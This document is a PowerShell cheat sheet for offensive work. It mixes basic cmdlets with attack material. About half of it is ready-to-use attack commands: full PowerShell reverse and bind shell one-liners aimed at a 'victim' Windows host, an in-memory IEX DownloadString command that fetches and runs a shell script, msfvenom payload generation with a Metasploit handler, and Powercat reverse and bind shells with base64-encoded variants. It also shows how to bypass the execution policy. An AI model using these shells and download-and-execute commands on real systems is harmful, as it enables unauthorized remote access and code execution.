Powershell Cheat Sheet

Cheat sheet and tricks for the Powershell programming language.

PowerShell under Kali Linux

Already installed in Kali Linux.

pwsh

Update Help commands

Update-Help

Test

Get-Process -Name sshd*

Set Execution Policy

Before running Powershell script, the right policy must be applied. Open a CMD window as an administrator (Run as administrator).

powershell Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser

Remove all restrictions

powershell Set-ExecutionPolicy Unrestricted

Remove all restriction for current user

powershell Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser

Show policies

powershell Get-ExecutionPolicy -List

Encoding & Encryption

Encode a command in base64

Using CyberChef, create recipe Encode text, choose UTF16LE (1200), then To base64.

On Unix:

printf 'dir c:\\' | iconv -t UTF-16LE | base64

Using Powershell:

powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('dir c:\\'))

Execute a command encoded in base 64

powershell -ENC ZABpAHIAIABjADoAXABcAA==

Decrypt System.Security.SecureString

$Enc = "somefile.enc"
$Key = "somefile.key"
$pwd = (Get-Content -Path $Enc | ConvertTo-SecureString -key (Get-Content -Path $Key))

# Powershell v6-, including Windows PowerShell
[Net.NetworkCredential]::new('', $pwd).Password

# Powershell v7+
#ConvertFrom-SecureString -AsPlainText $pwd

File Transfer

Download using HTTP

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://IP/file.txt','C:\Users\' + $Env:USERNAME + '\Desktop\file.txt')"

Download using HTTPS source

powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
(new-object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/w0lf-d3n/Quebec_Wordlist/main/quebec.txt','C:\Users\' + $Env:USERNAME + '\Desktop\quebec.txt')

Bind Shell

Client -> Bind shell -> Server

Server mode (victim, Windows)

powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"

Client mode (Kali)

nc -nv <WINDOWS IP> 443

Reverse Shell

Send a command shell to a host listening on a port.

Msfvenom

msfvenom -l payloads | grep -i powershell

cmd/windows/powershell_bind_tcp                     Interacts with a powershell session on an established socket connection
cmd/windows/powershell_reverse_tcp                  Interacts with a powershell session on an established socket connection
cmd/windows/reverse_powershell                      Connect back and create a command shell via Powershell
windows/powershell_bind_tcp                         Listen for a connection and spawn an interactive powershell session
windows/powershell_reverse_tcp                      Listen for a connection and spawn an interactive powershell session
windows/x64/powershell_bind_tcp                     Listen for a connection and spawn an interactive powershell session
windows/x64/powershell_reverse_tcp                  Listen for a connection and spawn an interactive powershell session

# To validate...
msfvenom -p windows/powershell_reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f exe > windows_shell.exe
msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT > shell.bat

msfconsole
use multi/handler
set payload cmd/windows/reverse_powershell 
set lhost X.X.X.X
set lport 443
run

On Kali (listener)

sudo nc -lnvp 443

On Windows (victim)

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<KALI IP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Rev shell – In memory

Kali

rev.ps1

$client = New-Object System.Net.Sockets.TCPClient('<KALI IP>',8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Distribute rev.ps1

python3 -m http.server 80

Victim (Windows)

powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://<KALI IP>/rev.ps1')

Examples

Powershell version

powershell $PSversionTable

Examples

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enter-pssession?view=powershell-7.2

powershell
Enter-PSSession -ComputerName Server01

# Display file content
powershell Get-Content /home/file1.txt

# Display content "live"
powershell get-content /home/file1.txt -tail 5 -wait

# List command history
powershell Get-History

# Display environment variables
Set-Location Env:
Get-ChildItem

# Display a specific environment variable
Get-ChildItem Env:Computername

# Escaping Powershell Restricted Environment
Type !

# Check execution policy for scripts (Restricted or Bypass)
Get-ExecutionPolicy

# Bypass execution policy for scripts
powershell -ep bypass

# Import a script
Import-Module .\get-indexeditem.ps1

# Search files with Windows Search Index (enabled by default)
Get-IndexedItem -Filter ""

# Kill a process by name
Stop-Process -Name "ProcessName" -Force

# Kill a process by PID
Stop-Process -ID PID -Force

# Test network connection
powershell Test-NetConnection proxy.example.com -Port 8080

Loop on results

$list=Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}

foreach ($item in $list) {
    write-host ("{0} {1}" -f $item.Name, $item.NameLength)
}

Powercat

Powershell version of Netcat.

• Official Documentation
• SANS Whitepaper

Download

Distribute Powercat from Kali

sudo cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 /var/www/html
sudo service apache2 start

On Windows

See File Transfer for more options.

bitsadmin /create JOB & bitsadmin /addfile JOB http://<KALI IP>/powercat.ps1 C:\Users\%USERNAME%\Desktop\powercat.ps1 & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOB

Usage examples

Change the execution policy as unrestricted.

Load Powercat

powershell
. C:\Users\someuser\Desktop\powercat.ps1

Help

powercat -h

File transfer

Send file from Windows using Powercat

powercat -c <KALI IP> -p 443 -i C:\Users\someuser\Desktop\powercat.ps1

Receive file on Kali

sudo nc -lnvp 443 > powercat.ps1
[Ctrl+C]

Reverse shell

Server mode (Kali)

sudo nc -lnvp 443

Client mode (Windows sends reverse shell)

powercat -c <KALI IP> -p 443 -e cmd.exe

Client mode (Windows using Stand-Alone base64 encoded payload)

powercat -c <KALI IP> -p 443 -e cmd.exe -ge > revshell.ps1
powershell.exe -E <generated base64 payload>

Bind shell

On Windows

powercat -l -p 443 -e cmd.exe

On Windows – Stand-Alone base64 encoded payload

powercat -l -p 443 -e cmd.exe -ge > bindshell.ps1
powershell.exe -E <generated base64 payload>

On Kali

nc <WINDOWS IP> 443